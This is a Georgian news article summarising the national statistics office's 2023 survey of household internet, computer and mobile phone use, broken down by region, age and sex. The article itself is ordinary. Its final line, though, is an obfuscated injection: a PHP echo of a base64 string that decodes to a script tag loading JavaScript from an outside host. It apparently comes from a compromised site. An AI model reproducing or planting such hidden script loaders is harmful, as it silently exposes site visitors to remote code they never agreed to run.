celsiusi
ავერსი საქკაბელი

 სტატისტიკის ეროვნული სამსახურის ინფორმაციით, შინამეურნეობებში საინფორმაციო და საკომუნიკაციო ტექნოლოგიების გამოყენების 2023 წლის გამოკვლევის შედეგების მიხედვით, ინტერნეტით უზრუნველყოფილია საქართველოს შინამეურნეობების 89.0 პროცენტი, რაც წინა წლის ანალოგიურ მაჩვენებელს 0.6 პროცენტული პუნქტით აღემატება.

ინტერნეტით უზრუნველყოფილი შინამეურნეობების წილი 0.3 პროცენტული პუნქტით გაიზარდა საქალაქო დასახლებაში, ხოლო 1.0 პროცენტული პუნქტით სოფლად და შესაბამისად, 93.1 და 83.4 პროცენტი შეადგინა. რეგიონების მიხედვით ყველაზე მაღალი მაჩვენებელი აჭარის ა.რ.-სა და თბილისში დაფიქსირდა და შესაბამისად, 96.2 და 94.2 პროცენტი შეადგინა.

ამასთან, საქსტატის გამოკვლევის შედეგების მიხედვით, ბოლო სამი თვის განმავლობაში ინტერნეტით ისარგებლა 6 წლის და უფროსი ასაკის მოსახლეობის 82.7 პროცენტმა, რაც 2.8 პროცენტული პუნქტით აღემატება წინა წლის ანალოგიურ მაჩვენებელს. საქალაქო დასახლებებში აღნიშნული მაჩვენებელი 87.7 პროცენტით, ხოლო სასოფლო დასახლებებში 74.7 პროცენტით განისაზღვრა. ეს მაჩვენებელი ქალების შემთხვევაში 83.0 პროცენტს, ხოლო კაცების შემთხვევაში 82.3 პროცენტს შეადგენს. ასაკობრივი ჯგუფების მიხედვით, ამ მაჩვენებლის მნიშვნელობა ყველაზე მაღალია 15-29 წლის მოსახლეობაში და 98.1 პროცენტს შეადგენს.

15 წლის და უფროსი ასაკის მოსახლეობიდან, რომლებიც ბოლო 3 თვის განმავლობაში სარგებლობდნენ ინტერნეტით, 93.0 პროცენტი ინტერნეტს ყოველდღე მოიხმარდა, 6.4 პროცენტი – კვირაში ერთხელ მაინც, 0.6 პროცენტი კი – უფრო იშვიათად. ასევე, 15 წლის და უფროსი ასაკის, ბოლო 12 თვეში ინტერნეტის მომხმარებელი მოსახლეობის 30.0 პროცენტმა ინტერნეტის მეშვეობით შეიძინა ან შეუკვეთა საქონელი ან მომსახურება. აღნიშნული მაჩვენებლის მნიშვნელობები განსხვავდება დასახლების ტიპის მიხედვით: საქალაქო დასახლებებში – 35.1 პროცენტია, ხოლო სასოფლო დასახლებებში – 20.7 პროცენტი. სქესის მიხედვით მაჩვენებლის მნიშვნელობები ქალებისათვის 32.8 პროცენტს, კაცებისათვის კი 26.7 პროცენტს შეადგენს. ასაკობრივი ჯგუფების მიხედვით მაჩვენებლის მნიშვნელობები განსხვავებულია: 15-29 წლის ასაკის მოსახლეობაში – 40.9 პროცენტი, 30-59 წლის ასაკის მოსახლეობაში – 30.9 პროცენტი, ხოლო 60 წლის და უფროსი ასაკის მოსახლეობაში – 13.0 პროცენტია.

უწყების გამოკვლევის შედეგების მიხედვით, 15 წლის და უფროსი ასაკის, ბოლო სამ თვეში ინტერნეტის მომხმარებელ მოსახლეობაში, ინტერნეტის გამოყენების ძირითად მიზნებს წარმოადგენს სოციალური ქსელების გამოყენება (95.6%), ინტერნეტ (აუდიო/ვიდეო) კავშირი (94.3%), ჯანმრთელობის საკითხებზე ინფორმაციის მოძიება (50.5%), ონლაინ ახალი ამბების/ გაზეთების/ჟურნალების წაკითხვა (49.1%), ინტერნეტ ბანკინგით სარგებლობა (47.1%), საქონლისა და მომსახურების შესახებ ინფორმაციის მოძიება (45.2%), ელ. ფოსტის მიღება/გაგზავნა (41.6%), პროგრამული უზრუნველყოფის პროდუქტის (გარდა თამაშებისა) ჩამოტვირთვა (16.1%) და სამუშაოს ძიება ან სამუშაოსთვის აპლიკაციების გაგზავნა (13.3%).

„15 წლის და უფროსი ასაკის, ბოლო 3 თვეში ინტერნეტის მომხმარებელთა 99.1 პროცენტმა გამოიყენა მობილური მოწყობილობა (მობილური ტელეფონი, ლეპტოპი, პლანშეტი და ა.შ.) უსადენო ინტერნეტთან დასაკავშირებლად. აღნიშნული მაჩვენებელი ქალებისათვის 99.2 პროცენტს, ხოლო კაცებისათვის – 98.9 პროცენტს შეადგენს. ამასთან, ასაკობრივ ჭრილში ყველაზე მაღალი პროცენტული მაჩვენებელი – 99.7%, 15-29 წლის მოსახლეობაში დაფიქსირდა“, – აღნიშნულია სტატისტიკის ეროვნული სამსახურის მიერ გამოქვეყნებულ ინფორმაციაში.

საქსტატის გამოკვლევის შედეგების მიხედვით, კომპიუტერით უზრუნველყოფილია შინამეურნეობების 57.7 პროცენტი. აღნიშნული მაჩვენებლის მნიშვნელობამ საქალაქო დასახლებებში 66.3 პროცენტი შეადგინა, ხოლო სასოფლო დასახლებებში – 46.0 პროცენტი. რეგიონების მიხედვით ეს მაჩვენებელი ყველაზე მაღალი აჭარის ა.რ.-სა და თბილისში დაფიქსირდა და შესაბამისად – 68.9 და 67.4 პროცენტი შეადგინა.

ამასთან, საქსტატის ანგარიშის მიხედვით, 6 წლის და უფროსი ასაკის მოსახლეობის 89.8 პროცენტი ფლობს მობილურ ტელეფონს, რაც წინა წლის ანალოგიურ მაჩვენებელთან შედარებით 1.7 პროცენტული პუნქტით მეტია. ამასთან, აღნიშნული მაჩვენებელი ქალაქის ტიპის დასახლებებში 0.7 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში 3.2 პროცენტული პუნქტით გაიზარდა და შესაბამისად 92.7 და 85.2 პროცენტი შეადგინა.

719
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");